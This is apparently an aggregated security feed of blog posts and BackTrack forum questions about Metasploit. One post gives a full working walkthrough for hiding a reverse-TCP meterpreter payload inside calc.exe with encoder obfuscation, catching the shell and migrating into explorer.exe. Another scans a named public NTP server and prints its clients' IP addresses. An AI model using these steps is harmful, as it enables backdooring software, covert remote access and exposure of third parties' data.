This Metasploit module exploits a stack overflow in WM Downloader version 3.0.0.9. By creating a specially crafted .pls file, an attacker may be able to execute arbitrary code.
19:12
Carnal0wnage
@hdmoore released a new auxiliary module a few days ago that went along with the NTP research he has been doing.
msf auxiliary(ntp_monlist) > set RHOSTS time.euro.apple.com
RHOSTS => time.euro.apple.com
msf auxiliary(ntp_monlist) > info
Name: NTP Monitor List Scanner
Version: 8432
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
hdm
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
CHOST no The local client address
RHOSTS time.euro.apple.com yes The target address range or CIDR identifier
RPORT 123 yes The target port
THREADS 1 yes The number of concurrent threads
Description:
Obtain the list of recent clients from an NTP server
msf auxiliary(ntp_monlist) >
And when you run the module, it looks a bit like this:
msf auxiliary(ntp_monlist) > run
[*] Sending probes to 17.72.255.11->17.72.255.11 (1 hosts)
[*] 17.72.255.11:123 86.138.33.93:56042 (17.72.255.11)
[*] 17.72.255.11:123 188.192.151.225:52210 (17.72.255.11)
[*] 17.72.255.11:123 81.167.222.18:36866 (17.72.255.11)
[*] 17.72.255.11:123 89.247.73.227:63929 (17.72.255.11)
[*] 17.72.255.11:123 80.39.165.55:123 (17.72.255.11)
[*] 17.72.255.11:123 82.19.218.58:123 (17.72.255.11)
[*] 17.72.255.11:123 82.123.121.154:123 (17.72.255.11)
[*] 17.72.255.11:123 90.207.190.29:123 (17.72.255.11)
[*] 17.72.255.11:123 193.52.24.125:38377 (17.72.255.11)
[*] 17.72.255.11:123 91.10.239.87:64361 (17.72.255.11)
--SNIP--
[*] 17.72.255.11:123 89.241.98.89:27213 (17.72.255.11)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ntp_monlist) >
Other neat shiz...
Sensepost put out a cool post talking about some of the other neat queries you can do using the ntp tools.
http://www.sensepost.com/blog/4552.html
Some quick research into NTP (from www.ntp.org) revealed that NTP servers allow you to perform a bunch of commands that are secondary to time keeping. You can easily play with these using the ntpdc client program, e.g. 'ntpdc target.ntp.server'. Some of these commands include:
- listpeers - List the peers(NTP servers) for the time server
- showpeer - Give time keeping info about a specific peer time server
- peers - List peers and some basic time keeping info
- sysstats - Info regarding ntp daemon itself
$ ntpq -c readvar time.euro.apple.com
assID=0 status=0684 leap_none, sync_ntp, 8 events, event_peer/strat_chg,version="ntpd 4.2.2@1.1532-o Mon Sep 24
01:42:27 UTC 2007 (1)", processor="i386", system="Darwin/9.6.0", leap=00, stratum=2, precision=-20, rootdelay=0.682, rootdispersion=10.719, peer=8126,
refid=17.72.133.54, reftime=cf648929.538400d4 Mon, Apr 5 2010 12:07:05.326, poll=7, clock=cf648a97.2560d91c Mon, Apr 5 2010 12:13:11.146, state=4, offset=0.149, frequency=43.608, jitter=0.058, noise=0.041, stability=0.000, tai=0
$ ntpdc -c peers time.euro.apple.com
remote local st poll reach delay offset disp
=======================================================================
*time1.euro.appl 17.72.255.11 1 128 377 0.00069 0.000155 0.07887
=time2.euro.appl 17.72.255.11 1 128 377 0.00061 0.000177 0.08919
=17.254.0.49 17.72.255.11 1 128 377 0.14996 0.000237 0.06696
=TrueTime.asia.a 17.72.255.11 1 128 377 0.31990 -0.000027 0.04962
=A17-106-100-13. 17.72.255.11 2 128 0 0.17369 0.007904 3.99217
+time4.euro.appl 17.72.255.11 2 32 376 0.00015 -0.000151 0.04303
$ ntpdc -c listpeers time.euro.apple.com
client time1.euro.apple.com
client time2.euro.apple.com
client 17.254.0.49
client TrueTime.asia.apple.com
client A17-106-100-13.apple.com
sym_active time4.euro.apple.com
Of course if you just want to do the monlist yourself you can...
$ ntpdc -c monlist time.euro.apple.com
remote address port local address count m ver code avgint lstint
===============================================================================
94.96.201.223.dynamic. 50951 17.72.255.12 5 3 4 0 0 0
static-86-51-114-108.m 316 17.72.255.12 25 3 4 0 0 0
207-38-154-68.c3-0.ave 40311 17.72.255.12 7 3 4 0 0 0
62-177-171-130.dsl.bbe 501 17.72.255.12 1 3 4 0 0 0
bb6a37ee.virtua.com.br 123 17.72.255.12 1 3 4 0 0 0
p4FC7545E.dip.t-dialin 123 17.72.255.12 1 3 4 0 0 0
--SNIP--
Still Interested?
http://www.ntp.org/documentation.html
4:20
remote-exploit & backtrack
Ok, upon testing Metasploit and not getting sessions when I should have been, I have concluded it may have something to do with port forwarding not being enabled.
I know how to forward ports: type 192.168.xx.x into my browser, supply my login details, and then go to port forwarding and configure. However, my only uncertainty is that officially I have two different IPs between my primary OS machine and my VM machine when I switch onto backtrack. For example, my OS IP is 192.168.xx.xx and my BT IP is 10.0.2.xx, so when I type 192.168.xx.x into my primary OS browser and forward ports, will the changes apply when I boot my Backtrack also, or is a different process required for that?
Hope you can provide some clarity.
2:02
remote-exploit & backtrack
Hey all ... I've been experimenting with backtrack and metasploit for the past few days now, and I've successfully managed to penetrate a Windows XP SP0 system using metasploit ... However, when I use the autopwn method in metasploit to scan an ubuntu 7.10 system, no sessions are automatically created, meaning no vulnerabilities were found .. Is this correct? Are there no exploits in backtrack/metasploit for linux based OSes ..?
Also, is metasploit's autopwn function a good way of scanning a network for vulnerable systems?
14:25
remote-exploit & backtrack
Hey guys, I'm trying to figure out how to ssh into a Metasploit reverse tcp handler running on my home machine. In case that's a little confusing, I have a machine on my home network with a Metasploit handler running. I can ssh into the box, but I'd like to be able to control that specific console. I don't know if this is possible or not and lots of searching hasn't gotten me anywhere, so here I am... Any help would be appreciated :)
17:47
remote-exploit & backtrack
Hi
For me, some metasploit auxiliary modules for oracle such as oracle_login and dbms_export_extension don't work any more.
The warnings are "OCI" errors (ruby-oci8). Even though I've successfully installed it in a fresh new Ubuntu ruby, I still can't run the oracle modules.
According to my knowledge, BT4 has already had ->
metasploit com/redmine/projects/framework/wiki/OracleUsage
Metasploit Framework - OracleUsage - Metasploit Redmine Interface
Any ideas?
5:33
remote-exploit & backtrack
Hello,
I am trying to use 'auxiliary/admin/oracle/login_brute' in metasploit 3.3 but I am getting the following error.
------
[-] Auxiliary failed: NameError uninitialized constant OCIError
[-] Call stack:
[-] /msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:434:in `load_missing_constant'
[-] /msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:80:in `const_missing_with_dependencies'
[-] /msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:92:in `const_missing'
[-] (eval):55:in `rescue in block in run'
[-] (eval):52:in `block in run'
[-] /usr/lib/ruby/1.9.1/csv.rb:1761:in `each'
[-] /usr/lib/ruby/1.9.1/csv.rb:1197:in `block in foreach'
[-] /usr/lib/ruby/1.9.1/csv.rb:1335:in `open'
[-] /usr/lib/ruby/1.9.1/csv.rb:1196:in `foreach'
[-] (eval):47:in `run'
[*] Auxiliary module execution completed
-----
I have tried the below recommendation for Windows Server 2003 environment but it is giving the same problem. Please assist. Thanks.
[1] Install subversion client
CollabNetSubversion-client-1.6.9-1.win32.exe
[2] Install ruby
ruby186-27_rc2.exe
[3] Install ruby-oci8
wget ruby-oci8-1.0.7-mswin32.rb
ruby ruby-oci8-1.0.7-mswin32.rb
[4]
svn co metasploit.com/svn/framework3/trunk/ metasploit
cd metasploit
ruby msfconsole (I am not able to execute this command successfully)
1:32
remote-exploit & backtrack
Hi! I was wondering whether it is possible to use metasploit, netcat and other tools when connected to the internet with an internet key (USB modem)? Does anything change?
18:06
remote-exploit & backtrack
For the last few weeks I've been playing with metasploit ...
I've had fun hacking an old server using the old net_api overflow on xp sp 2.
I just read the metasploit blog about the new adobe_libtiff exploit.
I used the payload
windows/meterpreter/reverse_tcp
(is this right?)
I have the PDF on the target machine, it works A-OK and connects back to my machine on xxx.xxx.xxx.3:1133. My question is ....
how do I go from a tcp connection to either a meterpreter session or vncinject using the command line in ruby?
I've tried:
connect xxx.xxx.xxx.4:1133 ... it connects but then does nothing?
^^^ do I need to run this as a bg session/job?
Any suggestions please
& please don't flame me
11:38
Carnal0wnage
Very cool update to metasploit today:
http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896
This update allows you to msfencode a msfpayload into an existing executable, and the new executable still functions like the original. So if you inject into calc.exe you get calc.exe and your backdoor.
Let's see the new msfencode options:
~/trunk$ ./msfencode -h
Usage: ./msfencode
OPTIONS:
-a The architecture to encode as
-b The list of characters to avoid: '\x00\xff'
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
-x Specify an alternate win32 executable template
Let's make our new backdoored executable.
~/trunk$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.210.11 R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
Get the backdoored exe on the other box and execute it. We have a functional calc.exe and our shell.

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.210.11
LHOST => 192.168.210.11
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.210.11:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 3 opened (192.168.210.11:4444 -> 192.168.210.11:51695)
Keep in mind that you'll still need to migrate away from the backdoored executable process because if they close the exe you lose your shell.
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > run migrate explorer.exe
[*] Current server process: calc_backdoor.exe (3360)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1592
[*] New server process: Explorer.EXE (1592)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getpid
Current pid: 1592
meterpreter >
0:53
remote-exploit & backtrack
hi,
MS10-002 ,ie_iepeers (Microsoft Internet Explorer iepeers.dll use-after-free exploit )
4xsecurityteam.blogspot(dot)com (home page)
4xunderground.blogspot(dot)com
vimeo(dot)com/user1010000
thk$
21:00
Packet Storm Security Recent Files
This Metasploit module exploits a stack overflow in the USER verb in Open & Compact FTPd version 1.2. The program will crash once the payload is sent, so bind shell payloads are not effective.
12:10
remote-exploit & backtrack
I've been playing around for the last few hours trying to get this working.
I've read many forum posts on different forums, but I still haven't got it working.
It doesn't help that all of the Fast-track websites are down, both "Secure State" and "The Pen Test".
I've done all sorts of weird stuff like create a user called "postgres", and I can't count how many ruby libraries I've installed.
Here's some of the guides I've followed:
Automate Your Pen Testing with Fast-Track and Linux - www.enterprisenetworkingplanet.com
The Bored IT Guy » How to install Fast-Track 4.0 on Ubuntu
[ubuntu] How to: metasploit with autopwn [Archive] - Ubuntu Forums
Here's the versions I'm working with:
Metasploit v3.3.4-dev
Fast-track v4.0
When I run Fast-track, it tests for dependencies and everything comes back OK except for pymills. I searched the web for pymills and it seems to have disappeared into a black hole, seems like the Russians came and kidnapped the developers.
If I do:
Code:
python fast-track.py -i
Enter 2 for Autopwn.
Enter the IP address.
Enter 2 for Reverse Binding.
Then it loads Metasploit but here's what I get, check out the errors in red:
Code:
msf > db_destroy pentest
dropdb: could not connect to database postgres: FATAL: Ident authentication failed for user "root"
msf > db_create pentest
createdb: could not connect to database postgres: FATAL: Ident authentication failed for user "postgres"
[-] Error while running command db_create: Failed to connect to the database: FATAL: Ident authentication failed for user "postgres"
Call stack:
/root/metasploit/lib/msf/ui/console/command_dispatcher/db.rb:1552:in `db_create_postgresql'
/root/metasploit/lib/msf/ui/console/command_dispatcher/db.rb:1078:in `send'
/root/metasploit/lib/msf/ui/console/command_dispatcher/db.rb:1078:in `cmd_db_create'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:239:in `send'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:239:in `run_command'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:201:in `run_single'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:195:in `each'
/root/metasploit/lib/rex/ui/text/dispatcher_shell.rb:195:in `run_single'
/root/metasploit/lib/rex/ui/text/shell.rb:144:in `run'
/root/metasploit/msfconsole:93
msf > db_nmap 192.168.1.111
[-] Unknown command: db_nmap.
msf > db_autopwn -p -t -e -r
[-] Unknown command: db_autopwn.
msf > sleep 5
msf > jobs -K
Stopping all jobs...
Anyone got any ideas?
10:43
remote-exploit & backtrack
Hello gentlemen, well, now I come with a video tutorial about exploiting a vulnerability found on port 445 of Windows 7. I already saw this bug published on the forum by Progresive Death; it's worth clarifying that he runs it from the source code, whereas I run it directly from metasploit, which is why I put this together. What we are going to do is get the famous blue screen on our victim machine. I hope you like the video, thanks.
Video
youtube.com/user/sOrtHacK#p/u/2/VwYJ60K16LI
12:40
remote-exploit & backtrack
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 Service Pack 1 - lang:Unknown
[*] Could not determine the exact language pack
[*] Exploit completed, but no session was created.
Exploit target:
Id Name
-- ----
0 Automatic Targeting
How can I manually select the version of it + language?
My 2nd question is how do I run the GUI of metasploit in windows?
Thanks.